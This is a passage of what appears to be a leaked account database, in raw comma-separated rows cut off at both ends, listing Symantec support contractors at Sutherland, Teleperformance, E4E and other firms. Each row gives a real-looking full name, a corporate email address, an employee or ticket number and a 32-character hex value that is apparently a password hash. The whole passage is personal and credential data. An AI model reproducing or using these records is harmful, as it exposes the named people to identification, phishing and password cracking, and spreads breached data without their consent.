and,3a6521eae627bbd28d483f1c7a65ef22,Abdulla,<blank>,Najib_Abdulla_Shriwerdhanka
r,Najib,NULL,NULL,NULL
0136-40c1-ae5f-0d61ea456f8d,<blank>,<blank>,Catherine_Yarra@SPI.COM,PM - 6/14/20
12 - CRQ000000694510,e93af8c53c3eb4e5348d5345a8a0ceba,Yarra,<blank>,226722,Cathe
rine,NULL,NULL,NULL
ffd-40cb-a040-910041e692eb,<blank>,<blank>,Narayanan_S@SUTH.COM,Sutherland,766f1
e269d125baf1cc21d253d12d50f,Shankaran,<blank>,Narayanan_Shankaran,Narayanan,NULL
,NULL,NULL
0d3-4792-bcdf-a1ea4137b122,<blank>,<blank>,Naveen_UP@SUTH.COM,Sutherland,2002c9c
c646cbef4e588ede68ec5898d,U,<blank>,Naveen_U_P,Naveen,NULL,NULL,NULL
c19-4af5-9a64-99a640f2b9f1,<blank>,2633284,tools_id@symantec.suth.com,Sutherland
,8ba84b5c0bed8d95ecea5f3f3bac9d39,Amar,<blank>,Navin_Amar_Bathija,Navin,NULL,NUL
L,NULL
353-4806-90c0-69030e71dc98,<blank>,<blank>,NazeemaBegum_A@SUTH.COM,Sutherland,9d
d69e70bd9217bc579dec3007a41b94,Begum,<blank>,Nazeema_Begum_A,Nazeema,NULL,NULL,N
ULL
3f1-4d31-b9c5-36aaeff63918,<blank>,<blank>,Neeraj_Gurbani@SUTH.COM,Sutherland,3e
b65918a5a086439644caa5984045ee,Ramesh,<blank>,Neeraj_Ramesh_Gurbani,Neeraj,NULL,
NULL,NULL
720-4ce5-9123-d4e1696dcce7,<blank>,<blank>,Neil_Harrison@SUTH.COM,Sutherland,3d5
57b6d26da850d9abd1574b2936b45,Harrison,<blank>,Neil_Harrison_Henry,Neil,NULL,NUL
L,NULL
ac3-4dc2-bd4c-ead5ced2d96f,<blank>,<blank>,Rahul_D@SUTH.COM,Sutherland,e3b294627
c56cfc70afe6d414c309cb4,D,<blank>,Rahul_D,Rahul,NULL,NULL,NULL
1a9-4726-9d3e-c87dbd87fd19,<blank>,85677,Tools_id@symantec.suth.com,Sutherland G
lobal Services,5d83884cd05d7551277b7c621afb14d6,Breathat,<blank>,marney_breathat
,Marney,NULL,NULL,NULL
7cf8-4969-9b22-2bd72967e818,CRQ000000196167-KD-11-2-2011,<blank>,Dinesh_Krishnan
_G@symantec.com,Symantec,9a350c302ec7e4118b6dfe90562bf766,Krishnan G,<blank>,111
848,Dinesh,NULL,NULL,NULL
544-44c6-9f3b-58a34c218f94,<blank>,<blank>,AnnieRao_S@SUTH.COM,Sutherland,59e569
a371bdfb37240c278a669ac8d2,Rao,<blank>,Annie_Rao_S,Annie,NULL,NULL,NULL
8251-4194-8050-96f8de8b60ed,<blank>,<blank>,tools_id@symantec.suth.com,PM - 3/14
/2012 - REQ000001305717,31984672cfd5d89f6c3754142d54f680,Surendra,<blank>,222459
,Sucheetkumar,NULL,NULL,NULL
b17-48d7-b87a-a0e238f80565,<blank>,<blank>,Balachandran_S@SUTH.COM,Sutherland,83
98f6e82c7190bbd73ed0a5dd028010,S,<blank>,Balachandran_S,Balachandran,NULL,NULL,N
ULL
bc2-47e0-8172-02eef6909db8,<blank>,<blank>,Binu_Nair@suth.com,Sutherland,3ac323c
28b11028bc4deab45a3f81d03,Nair,<blank>,Binu_Nair,Binu,NULL,NULL,NULL
2827-44c2-906c-77ddf5ca5d51,CRQ000000204567 - PR - 2/18/2011,<blank>,Sgerard_Aro
ckiaraj@symantec.com,<blank>,8720b62876a7f68390d0fd0dcb569d34,S,<blank>,113000,G
erard,NULL,NULL,NULL
87f7-4171-918a-8f7222addef7,CRQ000000709695--vmd--26/06/2012,<blank>,maryjones_r
eyes@suth.com,sutherland,8c774f761b6a520327942697c62c1a8c,Reyes,<blank>,226454,M
ary Jones,NULL,NULL,NULL
9b8-4e82-a635-399408ff5cee,<blank>,<blank>,Kaustubh_Lele@suth.com,Sutherland,49a
bd8e2e8c6c882bc74b2bd0ff3d441,Lele,<blank>,Kavita_Sheshbhan_Singh,Kaustubh,NULL,
NULL,NULL
871-4498-8221-893549e0a0e4,<blank>,<blank>,Kevin_Gandhi@SUTH.COM,Sutherland,f61e
a6a2e09862a1e28c423298b028fd,Rajesh,<blank>,Kevin_Rajesh_Gandhi,Kevin,NULL,NULL,
NULL
06f-41e1-b8f9-9a39fd790819,<blank>,<blank>,Mahalakshmi_Chendamarai@suth.com,Suth
erland,01a0989a03176ae525d9eb7df9b37c59,Chendamarai,<blank>,Mahalakshmi_Chendama
rai,Mahalakshmi,NULL,NULL,NULL
9c3-46bb-b279-633fd05bbc63,<blank>,<blank>,Parameshwaran_Ramakrishnan@SUTH.COM,S
utherland,ac76287734bc824296fdbb0a5baa2971,Ramakrishnan,<blank>,Parameshwaran_Ra
makrishnan,Parameshwaran,NULL,NULL,NULL
a71-4616-bc4b-525ec12df188,sms 29,2633282,tools_id@symantec.suth.com,Sutherland,
295f16245671eb1dd21455c04471329c,Jaisukh,<blank>,Prateek_Jaisukh,Prateek,NULL,NU
LL,NULL
24b-46c6-96c6-0a9ec2f85cf8,<blank>,<blank>,Prateek_Lokare@suth.com,Sutherland,9c
8eb5d7d977e851687c439b8e1d76e0,Narayan,<blank>,Prateek_Narayan_Lokare,Prateek,NU
LL,NULL,NULL
70a-487f-a705-71b506210e3c,<blank>,<blank>,linda.thornkvist@teleperformance.se,T
eleperformance Nordic,16913e81ced7ea86889593ac0f4ca289,Thornkvist,<blank>,Linda_
Thornkvist,Linda,NULL,NULL,NULL
a39-40c3-9b24-97a3dcad60f4,<blank>,<blank>,peter.maki-kauppila@teleperformance.s
,Teleperformance Nordic,9f88afec5e3a9dfde866439c47ffe181,Maki-Kauppila,<blank>,P
eter_Maki_Kauppila,Peter,NULL,NULL,NULL
637c-42d2-8bba-2cf4be8a8d55,CRQ000000349498 SP OCT 4 2011,000-0000,tools_id@syma
ntec.suth.com,Sutherland,2ca498d668d3c911cd959c750e229e5d,Joy Cruz,<blank>,07612
7,Kristine,NULL,NULL,NULL
6a9-44b7-ae4c-652056fade9b,<blank>,<blank>,mark.andersson@teleperformance.se,Tel
eperformance Nordic,2af44849450d7d7976a084bc1145e464,Andersson,<blank>,Mark_Ande
rsson,Mark,NULL,NULL,NULL
4177-4cc9-a84b-cd123388b556,CRQ000000349498 SP OCT 4 2011,000-0000,tools_id@syma
ntec.suth.com,Sutherland,b3e956e4e28307fda0c01248e01b6be0,MagtotoSumaguina,<blan
k>,103072,Hassanor,NULL,NULL,NULL
afe-4e89-802c-7bdc931f9417,<blank>,054374,jonas.v.persson@teleperformance.se,TPN
,129fcd243d1aa905f39d5980f02412c1,V. Persson,<blank>,jonas_persson,Jonas,NULL,NU
LL,NULL
94e-4b60-a833-a4cf8f9ce677,<blank>,<blank>,KotlaSaiSree_N@SUTH.COM,Sutherland,8f
0637cb4b0582ec4b329d527b0ff1da,Sai,<blank>,Kotla_Sai_Sree_N,Kotla,NULL,NULL,NULL
516b-4c25-b0c9-5355763a96f1,SRB 28.05.2010,INC182175,tools_id@symantec.suth.com,
Sutherland,087a88fa6ff6ec439ad3c7fe4bf3ee03,M S,<blank>,088588,Sateesh,NULL,NULL
,NULL
e129-4a35-96d5-14a52a1c1e3b,"CRQ000000341039-RJ-Sep 20, 2011",000-0000,malcom_go
nsalves@SUTH.COM,Sutherland,6d1c3411cccf17910da647786669c933,Gonsalves,<blank>,1
17111,Malcom,NULL,NULL,NULL
92b-4038-ad49-dd1ddab3ea30,<blank>,<blank>,richard.hedin@teleperformance.se,Arch
ived Teleperformance Nordic,989fe748c9b478db9a12157bde222590,Hedin,<blank>,Richa
rd_Hedin,Richard,NULL,NULL,NULL
989-4d28-88b2-7cbdc5265b17,<blank>,<blank>,andreas.hedberg@teleperformance.se,Te
leperformance Nordic,38a57c8bd6cfe3a1cb17b6aa3e097ee5,Hedberg,<blank>,Andreas_He
dberg,Andreas,NULL,NULL,NULL
b6e3-482e-a149-a8bf704abcbb,CRQ000000653465 SP 8 may 2012,000-0000,Saket_Shukla@
symantec.suth.com,Sutherland,cb472c9f9178abaafdce89d42d5cc54a,Shukla,<blank>,224
429,Saket,NULL,NULL,NULL
afb2-4a9c-a5d8-4be7f7a5f144,CRQ000000228849-KD-29-03-2011,000-000,tools_id@syman
tec.suth.com,Sutherland,1a0cad5e4bb328222fe1f312f8d6eb86,Satyanarayanan,<blank>,
099332,Karthik,NULL,NULL,NULL
f9ed-48b5-b46f-6cbd8949e924,CRQ000000709695--vmd--26/06/2012,<blank>,johndominic
k_calbay@suth.com,sutherland,150047b8b607fc4270490b85f1c385e1,Calbay,<blank>,226
453,John Dominick,NULL,NULL,NULL
0a6-40eb-9db0-834ff0b25c5f,<blank>,<blank>,mikael.vaananen@teleperformance.se,Ar
chived Teleperformance Nordic,dd87c5cfe5b55f65bf1380f85e1ea9e3,Vaananen,<blank>,
Mikael_Vaananen,Mikael,NULL,NULL,NULL
ccb-45cc-9e41-e1980d622746,<blank>,090918,Tools_id@symantec.suth.com,<blank>,7a8
be75d87d697c96acd6312aa5fb3d1,Das,<blank>,suman_das,Suman,NULL,NULL,NULL
418-45fd-af95-64645bb3f5fa,<blank>,<blank>,anders.kallman@teleperformance.se,Arc
hived Teleperformance Nordic,894a82d70b79b6f31363faf9ae29e54e,Kallman,<blank>,An
ders_Kallman,Anders,NULL,NULL,NULL
28b-4452-a2fe-fea2a90d70ae,<blank>,073441,Ming_Chai@symantec.com,e4e,c2e3f79fa47
59db74f9d1f992fb86d54,Jeorge ,<blank>,Jenny_Jeorge,Jenny ,NULL,NULL,NULL
687-475f-8737-4ba8d57f13ca,<blank>,<blank>,Tools_id@symantec.suth.com,Sutherland
Global Services,4110f450e3c22431845d8ed2d9a10d77,Kumar Ravi Kumar,<blank>,rathi
sh_kumarravikum,Rathish,NULL,NULL,NULL
5883-403c-8003-a077be643185,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,9eda43d39e409152de2f168bc238fa59,Pradhan,<blank>,rakesh_pradhan_cc,Rakesh
,NULL,NULL,NULL
aa4-4a3e-93cf-48b88eb05f1c,<blank>,<blank>,pcdoctor648@ipcdoctor.co.kr,Ipcdoctor
.co.kr,afbd1a126738448bb62864d812bc8429,kim,<blank>,hunil_kim,hunil,NULL,NULL,NU
LL
bb3-413e-a610-065efc385179,<blank>,<blank>,sunjung@ipcdoctor.co.kr,Ipcdoctor.co.
kr,519774d5a1516d1b242861308591f517,jeong,<blank>,sunjung_jeong,sunjung,NULL,NUL
L,NULL
96c-4120-afcb-7bfa8b862c7a,<blank>,<blank>,hyojinan@ipcdoctor.co.kr,Ipcdoctor.co
.kr,45d46de52dcc09d8786cb574802ffada,park,<blank>,jeonghyun_park,jeonghyun,NULL,
NULL,NULL
23c-4408-8039-27925869d529,<blank>,090908/2633282,Tools_id@symantec.suth.com,Sut
herland,499ec61a9a8b39710776ff1383e5532b,Shaikh,<blank>,sujatali_shaikh,Sujatali
,NULL,NULL,NULL
22ca-43d5-b1d2-5a6c893f10e2,CRQ000000229420,<blank>,tools_id@symantec.suth.com,K
SC-03/30/2011,d21b8b25357dfcdd62a40c9b71279866,Niranjanpitta,<blank>,109141,Vams
i Krishna,NULL,NULL,NULL
f736-46a0-8007-b061020fa8f5,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,0f26114624dc5ba435bd257fd82e71a4,P,<blank>,naveen_p_cc,Naveen,NULL,NULL,N
ULL
a6d-4083-9b18-fdc082b41a31,<blank>,<blank>,Sanuanand_Sathyanand@symantec.com,E4E
,6d83b45f3dbf68d71e1ede0d5af3c82b,S,<blank>,Sanuanand_S,Sanuanand,NULL,NULL,NULL
179a-4c67-99d9-83303e899fd8,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,096688a05c9438a2a6573eb2b8d271e4,Subramaniam,<blank>,gkm_subramaniam_cc,G
K M ,NULL,NULL,NULL
824-466e-8975-c27c1566dd33,<blank>,<blank>,vamshi.krishna@symantec.ts.e4e.com,E4
E,236728c39bf5804c59f5f54a8887b75c,Krishna,<blank>,Vamshi_Krishna,Vamshi,NULL,NU
LL,NULL
16fb-4350-b5cd-49e12011dfac,CRQ000000285484-CLNP 22 June 2011-URL,<blank>,tools_
id@symantec.suth.com,Sutherland,9f84688456103f4c8e5b7d83e492b3eb,Joshi,<blank>,1
17587,Parth,NULL,NULL,NULL
9d4-4740-8e1c-2bef8e8eccbc,<blank>,<blank>,Pardha_Brahmanandam@suth.com,Sutherla
nd,756f53f8e0e444fdc26559918e0a20b0,Saradhi,<blank>,Pardha_Saradhi_Polisetty,Par
dha,NULL,NULL,NULL
e654-4b7c-adde-8897d0eb88b6,SRB 27.05.2010,INC182175,tools_id@symantec.suth.com,
Sutherland,ec5f85a762ae54b191753a95e2599c79,T P,<blank>,088585,Hema Priya Dharsh
ini,NULL,NULL,NULL
c93c-4f5d-84be-bf96f469e3f8,CRQ000000439601--VMD--06/11/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,88e2ff448fb69e5b1cef9032af17bac1,Macantan,<blank>,122
791,Emil Canafranca,NULL,NULL,NULL
b0c7-4fa3-bbea-3978456f0645,"CRQ000000829995 CLNP Oct 08,2012",000-0000,johnalfr
ed_gare@symantec.com,Symantec,cfd217e8be5b5cc6c9d5c4dd95431643,Gare,<blank>,2305
91,John Alfred,NULL,NULL,NULL
1f3-447b-90e1-3dd48ec2e763,<blank>,<blank>,thomas.johnsson@teleperformance.se,Te
leperformance Nordic,042d7062e03c04f9244f82295e7e60d4,Johnsson,<blank>,Thomas_Jo
hnsson,Thomas,NULL,NULL,NULL
536-475d-b1c2-070e5c884bd0,<blank>,<blank>,claes.eismar@teleperformance.se,Telep
erformance Nordic,9da47925ef79a4f84adf16264297326a,Eismar,<blank>,Claes_Eismar,C
laes,NULL,NULL,NULL
b2e4-469c-a1dd-4a63679c595d,IT_Volume_Access_Request_20110405_NortonLive062,<bla
nk>,matthewtatsuzogomez_@symantec.com,CRQ000000247181 - PR - 4/28/2011,dd84271c1
3b36c7aabede6887f9de84d,Sato,<blank>,114735,Matthew Tatsuzo Gomez,NULL,NULL,NULL
0b5-4566-bf03-0c4fd73ac3cc,<blank>,<blank>,dto@symantec.com,Symantec,7fd0f3fb202
737b8940d9630e576255c,To,<blank>,daniel_to,Daniel,NULL,NULL,NULL
837f-4abb-83ae-b62003ecb917,CRQ000000641972---vmd--27/04/2012,000-000,william_fe
rnandes@suth.com,sutherland,4a3096261d86aeadd452a237cf67a9cd,Fernandes,<blank>,2
24261,William,NULL,NULL,NULL
23fc-478b-ae36-4ec41a15bb65,CRQ000000681045--vmd--01/06/2012,000-000,tools_id@sy
mantec.suth.com,Sutherland,32d2aa071c4f3fda35d99af7bb31e560,Sequeira,<blank>,226
161,Charles,NULL,NULL,NULL
e2f-4b9f-84ce-3f16c34cb1ff,<blank>,<blank>,daniel.svendsen@teleperformance.se,Te
leperformance Nordic,018bb74179eb8da8794463e3c44d978a,Svendsen,<blank>,Daniel_Sv
endsen,Daniel,NULL,NULL,NULL
061-41c8-9874-630a64e80c26,<blank>,081266,Emilio.RebolaGrosz@tp-tec.nl,TPH,5e017
86c4ae1011dd3c193c069b1a591,Rebola Grosz,<blank>,emilio_rebolagrosz,Emilio,NULL,
NULL,NULL
860-474a-a03a-21c6a47a7d9f,<blank>,<blank>,sverre.ormestad@teleperformance.se,Te
leperformance Nordic,95cb58af23ca579c32608f6107cb434f,Ormestad,<blank>,Sverre_Or
mestad,Sverre,NULL,NULL,NULL
55e-4ae2-a0b2-a4ef7cd67340,<blank>,<blank>,Ming_Chai@symantec.com,Symantec,81a14
199511114def08bff763213c7f4,Desai,<blank>,091563,Akanksha,NULL,NULL,NULL
8a9-4fd9-8852-4729d6bcf002,<blank>,EMPROV,symaccount@clts.com,CLTS,c51236738aa36
9c3bae9fdd874bcfd87,Li,<blank>,088839,Huayang,NULL,NULL,NULL
85bb-4944-baf8-a5a3ae9d02a9,CRQ000000681065--VMD--01/06/2012,<blank>,tools_id@sy
mantec.suth.com,SUTHERLAND,c45ab511921630f172f89a406a141310,J,<blank>,226168,Ant
ony,NULL,NULL,NULL
88e-4af7-b530-8943a997a38a,<blank>,<blank>,robin.aspenfelt@teleperformance.se,Te
leperformance Nordic,fc6d67ff32cce2192b924e50027f7b71,Aspenfelt,<blank>,Robin_As
penfelt,Robin,NULL,NULL,NULL
a9c-4bae-952b-0b64b791bb0e,<blank>,<blank>,daniel.nilsson@teleperformance.se,TPN
,4104e3779cfdae213708773ddb0a97ff,Nilsson,<blank>,Daniel_Nilsson,Daniel,NULL,NUL
L,NULL
a74-4e7e-ac96-e5089fdab2ab,<blank>,<blank>,Ming_Chai@symantec.com,Symantec,12fca
957ba880333fb5cdea0496d72ff,Greaves,<blank>,091570,David,NULL,NULL,NULL
dad-4daa-b9fa-266c0430a19a,<blank>,<blank>,tgjw1004@ipcdoctor.co.kr,Ipcdoctor.co
.kr,46d7d0336ad3bcae69469339ae78b1d7,han,<blank>,jungwan_han,jungwan,NULL,NULL,N
ULL
40c-48bb-9813-4796fbee6b0b,<blank>,<blank>,Sayooj.Venugopal@e4e.com,E4E,c35ad62a
7526a77d0f1367a52956416f,Venugopal,<blank>,Sayooj_Venugopal,Sayooj,NULL,NULL,NUL
L
1111-4a66-bc4a-aefed5aa3b71,"CRQ000000682570 CLNP June 04,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,77e3d898e842500338c140d071b4e217,Deshmukh,<bl
ank>,226236,Manoj,NULL,NULL,NULL
ee26-482d-ab2e-831bb45b402e,CRQ000000285687-CLNP 22 June 2011,<blank>,tools_id@s
ymantec.suth.com,Sutherland,1e5a2eb675cd86201324b66847ba983d,Jadav,<blank>,11759
5,Tushar,NULL,NULL,NULL
481e-4938-8c01-d2a5ecc08aaf,CRQ000000285473--vmd--23/06/10,000-000,tools_id@syma
ntec.suth.com,Sutherland,cd760015ffeed0ef8ccbdce76de92a8d,Lail,<blank>,117584,Gu
rsharan singh,NULL,NULL,NULL
9ab-4cf1-9ae1-a1d534a0fc21,<blank>,<blank>,ashish.tirkey@ts.e4e.com,E4E,618c543e
5f453eaffada82282e88806a,Tirkey,<blank>,Ashish_Tirkey,Ashish,NULL,NULL,NULL
1bf4-405e-8456-4d96944aa2fd,<blank>,<blank>,diego_freda@symantec.com,Symantec,6e
68ae242197d77e84b385fce7003897,Freda,<blank>,diego_freda,Diego,NULL,NULL,NULL
cfcc-4eca-b081-6db78b5122eb,<blank>,<blank>,leo_modelo@SPI.COM,PM - 8/28/2012 -
CRQ000000783714,3b4187bb955f48da54e5b06496e06e7f,Modelo,<blank>,229462,Leo,NULL,
NULL,NULL
6a1-4ead-aecf-5c34f1f96027,<blank>,<blank>,jimmy.vedin@teleperformance.se,Archiv
ed Teleperformance Nordic,194519b56e163e92ca40011bdb4ae484,Vedin,<blank>,Jimmy_V
edin,Jimmy,NULL,NULL,NULL
1ac-4e70-a920-f515ef649d8c,<blank>,<blank>,james_blackwell@symantec.com,Symantec
,db89a655d8c79633ae7fa56354ef577d,Blackwell,<blank>,james_blackwell,James,NULL,N
ULL,NULL
0ee-43c0-bd2b-98d24a8cff6c,<blank>,<blank>,hyojinan@ipcdoctor.co.kr,Ipcdoctor.co
.kr,fd0099bac490a91ceba294bd6aea515f,an,<blank>,hyojin_an,hyojin,NULL,NULL,NULL
094-4d0d-9f0e-60ba7b564cfe,<blank>,<blank>,akiko@ipcdoctor.co.kr,Ipcdoctor.co.kr
,f923cd8f2850741d129d4a20bb829862,fujji,<blank>,akiko_fujji,akiko,NULL,NULL,NULL
7a15-4105-8f46-9555301d2ac6,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,e
e5d4aa2340684fa735ebb32d8ea0eef,Mohanan,<blank>,108880,MeenuSavithri,NULL,NULL,N
ULL
7357-462f-9a15-6408b97c0090,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
716126,12d5a3f2e7f4268c07b68495e4c8e070,Rebosura,<blank>,227436,Angeline Pearl ,
NULL,NULL,NULL
07f-4e1b-ac86-0e2cc26f9e89,<blank>,<blank>,antapur.srinivasa@symantec.ts.e4e.com
,E4E,ba23fed55e06b767cc24a4875c236c59,Srinivasa,<blank>,Antapur_Srinivasa,Antapu
r,NULL,NULL,NULL
57b-4565-8800-b4f9859297ca,<blank>,<blank>,mohd.zameer@symantec.ts.e4e.com,E4E,c
a555df4bc67d3210e0deb2e683d0434,Zameer,<blank>,Mohammed_Zameer,Mohammed,NULL,NUL
L,NULL
889-46a5-96c1-5bff44cc7385,<blank>,<blank>,natsuyo@ipcdoctor.co.kr,Ipcdoctor.co.
kr,e5637aed995db7f7eda067f9c5829db3,sukizaki,<blank>,natsuyo_sukizaki,natsuyo,NU
LL,NULL,NULL
e60d-4cb9-99f5-be864d2354f8,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,5f874e411a9d1a7b402646b9815c8932,Dharmateja,<blank>,v_dharmateja_cc,V ,NU
LL,NULL,NULL
87d-4941-b352-533190b796fb,<blank>,<blank>,hidaka@ipcdoctor.co.kr,Ipcdoctor.co.k
r,71c982578a094b2eb902f96ae53859a1,hana,<blank>,hidaka_hana,hidaka,NULL,NULL,NUL
L
d71-463e-a83b-25aa35b7c159,<blank>,<blank>,kano@ipcdoctor.co.kr,Ipcdoctor.co.kr,
1ca5ac8fd934a2ba3c18b7da2124703b,reiko,<blank>,kano_reiko,kano,NULL,NULL,NULL
42fb-451c-a008-b40ef49da17f,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
716135,010a88b926839692650175f5ce562be6,Lumawig,<blank>,227439, Maybelle ,NULL,N
ULL,NULL
3ff-4027-ba7b-10196351989e,<blank>,<blank>,Myounghee@ipcdoctor.co.kr,Ipcdoctor.c
o.kr,7afa2152446333a2851329632235b848,takehara,<blank>,kiyomi_takehara,kiyomi,NU
LL,NULL,NULL
625-4a67-aaf8-648f5c201dc6,<blank>,<blank>,subashini.j@symantects.chnts.e4e.com,
E4E,30a5ca979a172eac24588c2d46b2bafa,Jayaramana,<blank>,Subhashini_Jayaramana,Su
bhashini,NULL,NULL,NULL
224-4a41-8ce2-a68f4286c762,<blank>,<blank>,sathish.muthu@symantects.chnts.e4e.co
,E4E,9b5ad9cf1e83644adf19919b2a876421,Muthusamy,<blank>,Sathish _Muthusamy,Sathi
sh ,NULL,NULL,NULL
7a2-45fb-92fa-6bc8ada02cc4,<blank>,<blank>,sunilkumar.c@symantects.chnts.e4e.com
,E4E,39deac8946a9c29bfd94b177ebe3e9d9,Chinnan,<blank>,Sunil _Chinnan,Sunil ,NULL
,NULL,NULL
efd-4ca4-bbdb-83f3a1e73275,<blank>,<blank>,achary.vinodkumar@symantects.chnts.e4
,E4E,d241e3281b449473830607119be473b4,Murugan,<blank>,Achary Vinod_Murugan,Achar
y Vinod,NULL,NULL,NULL
d68-4d7d-a849-297af9ed2528,<blank>,<blank>,Devalapura.t@symantects.chnts.e4e.com
,E4E,7c990f077de84b54809d1006d451057d,D.T,<blank>,Rakesh _D.T,Rakesh ,NULL,NULL,
NULL
6d5-4e77-ad03-4856159126c5,<blank>,<blank>,ejlee@ipcdoctor.co.kr,Ipcdoctor.co.kr
,4badfa768c06f02e24fe2593771707b8,Lee,<blank>,EunJoo_Lee,EunJoo,NULL,NULL,NULL
0a7-458f-81b3-eef96f010cc1,<blank>,<blank>,christhon@ipcdoctor.co.kr,Ipcdoctor.c
o.kr,f35645507bf067fad482b44fe9fbb39c,Jin,<blank>,SeHoon_Jin,SeHoon,NULL,NULL,NU
LL
ecef-499a-a866-8065fdd8cf21,CRQ000000718014--vmd--03/07/2012,<blank>,sankaran_g@
suth.com,sutherland,ba85f2d70b2fa8adaaf564e0df3e8b40,G,<blank>,227376,Sankaran,N
ULL,NULL,NULL
f51-4281-8abc-c7e5acffe12a,<blank>,<blank>,shaloms21@ipcdoctor.co.kr,Ipcdoctor.c
o.kr,112bd923bab8ecb6dd313d1ebd651c25,Park,<blank>,HakSoo_Park,HakSoo,NULL,NULL,
NULL
6c1-4551-88ce-9f2762eac914,<blank>,<blank>,m.verma@symantects.chnts.e4e.com,E4E,
a34a4792c3fcabfa436819ae25dff979,Verma,<blank>,Manish_Verma,Manish,NULL,NULL,NUL
L
487e-4a31-8ab3-217169ced2fb,"CRQ000000830008 CLNP Oct 08,2012",000-0000,dahliali
gaya_bernabe@symantec.com,Symantec,17249e219ea86d57d80be600f9523c74,Bernabe,<bla
nk>,230598,Dahlia Ligaya,NULL,NULL,NULL
ec2-4e35-a188-ba229d6c978b,<blank>,081261,symantec_2nd_maa@tp-tec.nl,TPH,71029b9
034e510f2734e772f88da2f6c,Loeschmann,<blank>,ralf_loeschmann,Ralf,NULL,NULL,NULL
898-4500-bcf3-a804737190c2,<blank>,<blank>,patrik.tinglof@teleperformance.se,Tel
eperformance Nordic,2ff7e4ab6f270d0c852425f4536f5ce8,Tinglof,<blank>,Patrik_Ting
lof,Patrik,NULL,NULL,NULL
d96c-4928-a0ba-1c6ff207bec9,CRQ000000603595--vmd--23/03/2012,<blank>,jenelyn_hub
illa@Suth.com,Sutherland,fcd6b83c93d700dae04b25327b49c771,Hubilla,<blank>,222670
,Jenelyn,NULL,NULL,NULL
4dae-4493-ab7e-25dc444f393a,<blank>,<blank>,Bryancris_Deguzman@SPI.COM,PM - 6/14
/2012 - CRQ000000694449,f063796803a024b66f65ff300525a1fb,De Guzman,<blank>,22670
3,Bryan Cris,NULL,NULL,NULL
434-4a43-bf6b-605ecbccdf78,<blank>,<blank>,rajib.das@symantec.ts.e4e.com,E4E,0df
7555bfd288c567270c187644820ef,Das,<blank>,Rajib_Das,Rajib,NULL,NULL,NULL
95eb-4f40-811d-7e499a62db58,SRB 25.06.2010,INC202269,tools_id@symantec.suth.com,
Sutherland,d29834165d3a7810ad4e96c1c935b3f2,Parmar,<blank>,105266,Shishir Shanti
lal,NULL,NULL,NULL
33d4-4a0a-8889-b10ebde0d163,CRQ000000624255--vmd--11/04/2012,<blank>,cknud@syman
tec.teleperformance.gr,Teleperformance,82a65f0db113485f14398d1b164c8312,Knud,<bl
ank>,223760,Canuto,NULL,NULL,NULL
083-40e6-a454-3a1ab0380ef5,<blank>,<blank>,PremSudhanChristopher_J@SUTH.COM,Suth
erland,ae36b49c3495611cc3f665cde23b1c54,Sudhan,<blank>,Prem_Sudhan_Christopher_J
,Prem,NULL,NULL,NULL
da6-4eb9-8da7-73759daa1d63,<blank>,<blank>,sonali.das@symantec.ts.e4e.com,E4E,18
7df07948c74a2236e2d07bd81d311d,Das,<blank>,Sonali _Das,Sonali ,NULL,NULL,NULL
72c2-48a7-b43e-5cdf640e8e45,NA 7 th April 2011,CRQ000000235043,tools_id@symantec
.suth.com,<blank>,6937a2d9f585d1017b43d915049fbfa2,A,<blank>,108918,James,NULL,N
ULL,NULL
609-498e-9093-a1dc590ec63c,<blank>,<blank>,Mohd.Khaja@symantec.ts.e4e.com,E4E,55
70975ab8631b0ac128d9f8a1c98146,Khaja,<blank>,Mohd_Khaja,Mohd ,NULL,NULL,NULL
cac6-4601-bffb-0536f7fd7837,CRQ000000624258--vmd--11/04/2012,<blank>,caspasidis@
symantec.teleperformance.gr,Teleperformance,b7561bf8cf4b3300cdca66baf754ddab,Asp
asidis,<blank>,223681,Cristopher,NULL,NULL,NULL
640f-49ec-ab56-2917399e5e58,CRQ000000641923---vmd--27/04/2012,000-000,sahadev_ma
la@suth.com,Sutherland,71653cbae2bcf6e0a190d79785bf4455,Mala,<blank>,224253,Saha
dev,NULL,NULL,NULL
6a6-40ec-93e6-95396410f35b,<blank>,<blank>,richard.honeyson@symantec.ts.e4e.com,
E4E,2e06e35e98748067a08174da04d065ba,Honeyson,<blank>,Richard _Honeyson,Richard
,NULL,NULL,NULL
599-4280-a04e-4ca958b32fd4,<blank>,<blank>,sujesh.surendran@symantec.ts.e4e.com,
E4E,405cd9c69b633c99c2b34c8769f10c05,Surandran,<blank>,Sujeesh _Surandran,Sujees
h ,NULL,NULL,NULL
c10-4930-917c-5db0b97c9d49,<blank>,<blank>,prabha.john@symantec.ts.e4e.com,E4E,3
484c6cfe45aaecd49f8677c86da10e2,John,<blank>,Prabha Anna _ John,Prabha Anna ,NUL
L,NULL,NULL
1f8-4ecf-bfc3-9192f3f09d98,<blank>,<blank>,krishna.tatavarthy@symantec.ts.e4e.co
,E4E,41e19b146a6721655e3f8c79af8d466e,Tatavarthy,<blank>,Radhakrishna_Tatavarthy
,Radhakrishna,NULL,NULL,NULL
ead-4741-a7d5-1bc282ac7015,<blank>,<blank>,atul.anuragi@symantec.ts.e4e.com,E4E,
9ce4f1f93aef0e794c33d00e01660d44,Anuragi,<blank>,Atul Kumar_Anuragi,Atul Kumar,N
ULL,NULL,NULL
0f9-432e-b8a5-69a4251177e7,<blank>,<blank>,vasantha.v@symantec.ts.e4e.com,E4E,a2
5a5d06893ae4caa6fbfadc31061c5a,V,<blank>,Vasantha _V,Vasantha ,NULL,NULL,NULL
1f9-4b92-a7a0-8a84936d9d53,<blank>,<blank>,kaustabh.b@symantec.ts.e4e.com,E4E,62
d839eb0e0ea8b2e9d424de8254cc74,Bhattacharjee,<blank>,Kaustabh_ Bhattacharjee,Kau
stabh,NULL,NULL,NULL
686-428a-9a7d-ba5b132ea269,<blank>,<blank>,madhu.m@symantec.ts.e4e.com,E4E,50ea4
a6483752adadd73cf793f26b151,Nanjappa,<blank>,Madhu _ Nanjappa,Madhu ,NULL,NULL,N
ULL
519-476c-8222-b953e2cb324a,<blank>,<blank>,Rahul_Raghani@SUTH.COM,Sutherland,0ef
